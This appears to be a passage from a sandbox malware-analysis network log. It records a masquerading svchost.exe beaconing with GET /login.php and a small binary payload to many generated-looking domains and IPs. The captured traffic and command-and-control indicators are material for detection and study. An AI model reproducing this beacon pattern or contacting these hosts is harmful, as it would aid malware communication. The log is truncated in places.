type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNDQzODYxNSwiaWF0IjoxNzI0NDMxNDE1LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydm42aWYyZGhkZ2Vja2JhaDAwYWllcWIiLCJuYmYiOjE3MjQ0MzE0MTUsInRzIjoxNzI0NDMxNDE1MDQ5MzMyfQ.q8fyeqWKtqXvR-jaXmTefGHIiCV3QgvJddvdNB6D9oo&sid=a5fae49c-616e-11ef-add0-e1f04491a098');</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.5	59540	91.195.240.19	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:35.109915018 CEST	277	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:35.779875994 CEST	1236	IN	HTTP/1.1 200 OK date: Fri, 23 Aug 2024 16:43:35 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA== last-modified: Fri, 23 Aug 2024 16:43:35 GMT x-cache-miss-from: parking-89b87dbbb-2rptz server: Parking/1.0 Data Raw: 32 45 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 67 35 72 6c 58 73 39 52 75 52 57 34 64 67 6c 71 51 35 4c 79 64 4a 45 74 74 53 54 56 42 73 66 70 54 67 35 59 62 54 62 54 67 78 51 79 43 78 4a 61 58 2f 34 77 57 7a 74 49 41 4f 75 52 6c 32 79 56 59 68 58 30 57 47 46 31 59 61 65 77 33 55 38 35 6e 47 49 35 75 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 67 61 68 79 71 61 68 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 67 61 68 79 71 61 68 20 [TRUNCATED] Data Ascii: 2E3<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==><head><meta charset="utf-8"><title>gahyqah.com - gahyqah Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="gahyqah.com is your first and best source for all of the information youre looking for. From ge
Aug 23, 2024 18:43:35.779906988 CEST	1236	IN	Data Raw: 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 67 61 68 79 71 61 68 2e 63 6f 6d 20 68 61 73 20 69 74 20 61 6c 6c Data Ascii: neral topics to more of what you would expect to find here, gahyqah.com has it all. We hope you find what you are searching for!"><link 1062 rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sed
Aug 23, 2024 18:43:35.779925108 CEST	1236	IN	Data Raw: 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 Data Ascii: {border-style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[
Aug 23, 2024 18:43:35.779942036 CEST	1236	IN	Data Raw: 74 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 74 65 6d 70 6c 61 74 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61 6e Data Ascii: t-item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;
Aug 23, 2024 18:43:35.779958963 CEST	1236	IN	Data Raw: 6e 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 20 61 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 Data Ascii: ntainer-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-
Aug 23, 2024 18:43:35.779982090 CEST	1120	IN	Data Raw: 66 6f 6e 74 2d 73 69 7a 65 3a 6c 61 72 67 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 7b 70 6f 73 69 74 Data Ascii: font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:c
Aug 23, 2024 18:43:35.779999018 CEST	1236	IN	Data Raw: 62 32 63 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 78 2d 6c 61 72 67 65 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 2d 73 6d 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 32 31 38 38 33 38 3b 62 6f 72 64 65 72 2d Data Ascii: b2c;color:#fff;font-size:x-large}.btn--success-sm{background-color:#218838;border-color:#218838;color:#fff;font-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{back
Aug 23, 2024 18:43:35.780015945 CEST	1236	IN	Data Raw: 69 74 63 68 5f 5f 73 6c 69 64 65 72 3a 62 65 66 6f 72 65 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 70 78 29 3b 2d 6d 73 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 58 28 32 36 Data Ascii: itch__slider:before{-webkit-transform:translateX(26px);-ms-transform:translateX(26px);transform:translateX(26px)}body{background-color:#0e162e;font-family:Arial,Helvetica,Verdana,"Lucida Grande",sans-serif}body.cookie-message-enabled{padding-b
Aug 23, 2024 18:43:35.780060053 CEST	1236	IN	Data Raw: 65 6e 74 65 72 20 6c 65 66 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 39 34 25 20 36 34 30 70 78 3b 66 6c 65 78 2d 67 72 6f 77 3a 32 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 73 63 61 6c 65 58 28 2d 31 29 3b 2d 6f 2d 74 72 61 6e Data Ascii: enter left;background-size:94% 640px;flex-grow:2;-moz-transform:scaleX(-1);-o-transform:scaleX(-1);-webkit-transform:scaleX(-1);transform:scaleX(-1);z-index:-1;top:50px;position:inherit}.container-content--lp{min-height:720px}.container-conten
Aug 23, 2024 18:43:35.780076027 CEST	1236	IN	Data Raw: 3a 23 66 66 66 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 6c 69 6e 6b 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e Data Ascii: :#fff}.two-tier-ads-list__list-element-link{font-size:1em;text-decoration:underline;color:#9fd801}.two-tier-ads-list__list-element-link:link,.two-tier-ads-list__list-element-link:visited{text-decoration:underline}.two-tier-ads-list__list-eleme
Aug 23, 2024 18:43:35.784924984 CEST	1236	IN	Data Raw: 77 69 64 74 68 3a 31 30 30 25 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 7d 2e 6e 63 2d 63 6f 6e 74 61 69 6e 65 72 20 73 70 61 6e 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 65 6c 2c Data Ascii: width:100%;text-align:center;margin-top:10px}.nc-container span{font-family:Ariel,sans-serif;font-size:16px;color:#888} </style><script type="text/javascript"> var dto = {"uiOptimize":false,"singleDomainName":"gahyqah.com","domain

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.5	59541	85.17.31.122	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:35.129010916 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.5	59542	199.59.243.226	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:36.568149090 CEST	306	OUT	GET / HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww6.galyqaz.com Connection: Keep-Alive Cookie: vsid=918vr471976932991951418 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:37.032530069 CEST	1236	IN	HTTP/1.1 200 OK date: Fri, 23 Aug 2024 16:43:36 GMT content-type: text/html; charset=utf-8 content-length: 1090 x-request-id: 4c4d0104-a761-4b1d-b322-11c609f239c7 cache-control: no-store, max-age=0 accept-ch: sec-ch-prefers-color-scheme critical-ch: sec-ch-prefers-color-scheme vary: sec-ch-prefers-color-scheme x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QliUBPAEOEdNA6rDrNK1tfWab2TXfIKI+9TV2jRO8icV3hISskcFUN/T5x9KHqbJXu77vojtyRNSj2qEh4i50Q== set-cookie: parking_session=4c4d0104-a761-4b1d-b322-11c609f239c7; expires=Fri, 23 Aug 2024 16:58:36 GMT; path=/ Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 51 6c 69 55 42 50 41 45 4f 45 64 4e 41 36 72 44 72 4e 4b 31 74 66 57 61 62 32 54 58 66 49 4b 49 2b 39 54 56 32 6a 52 4f 38 69 63 56 33 68 49 53 73 6b 63 46 55 4e 2f 54 35 78 39 4b 48 71 62 4a 58 75 37 37 76 6f 6a 74 79 52 4e 53 6a 32 71 45 68 34 69 35 30 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED] Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_QliUBPAEOEdNA6rDrNK1tfWab2TXfIKI+9TV2jRO8icV3hISskcFUN/T5x9KHqbJXu77vojtyRNSj2qEh4i50Q==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="pr
Aug 23, 2024 18:43:37.032557011 CEST	731	IN	Data Raw: 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 Data Ascii: econnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNGM0ZDAxMDQtYTc2MS00YjFkLWIzMjItMTFjNjA5ZjIzOWM3IiwicGFnZV90aW1lIjoxNzI0NDMxNDE2LCJwYWdlX3VybCI6I

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.5	59544	154.212.231.82	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:36.780541897 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:37.767007113 CEST	696	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 23 Aug 2024 16:43:37 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 23, 2024 18:43:37.768205881 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:38.160063982 CEST	696	IN	HTTP/1.1 404 Not Found Server: nginx Date: Fri, 23 Aug 2024 16:43:38 GMT Content-Type: text/html Content-Length: 548 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.5	59545	85.17.31.122	80

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:36.873982906 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	59546	172.234.222.143	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:42.390125990 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	59547	13.248.169.48	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:46.009900093 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	50842	188.114.96.3	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:46.033679962 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:47.523147106 CEST	791	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 23 Aug 2024 16:43:47 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://lysyvan.com/login.php CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FwbTrNs2wrMmh0vXuAWHA7%2FGGo1MicuT%2BdSvmPQ8Pan6pxqGfMVp0tpGiP62icqHSrsasZw71tlAx6Y9R4jSOzhVYONsE4Qlr77u5U0aWpLtNAsaDQ1bY76%2FfyUYqg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c903f3d304334-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0
Aug 23, 2024 18:43:49.930955887 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:43:50.959286928 CEST	801	IN	HTTP/1.1 301 Moved Permanently Date: Fri, 23 Aug 2024 16:43:50 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: keep-alive Location: https://lysyvan.com/login.php CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OkPNR06g6nohNlY%2BsrqJYMNJeBde%2BZMlp8WVOuBHEQn8bt%2BihCmzOJcFLwyzvY36DOG7QcLtST4i4Z%2FwTrPVcw%2BGcZlUqsnNTpX075B9zCkuhpD%2B99A8zO%2F7RAT%2Fmw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8b7c90556d4b4334-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.5	50843	18.208.156.248	80	5284	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:43:46.214344978 CEST	373	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupycag.com Content-Length: 6 Cookie: btst=2defa10e06435b44928a9b853377cfec\|8.46.123.33\|1724431347\|1724431347\|0\|1\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
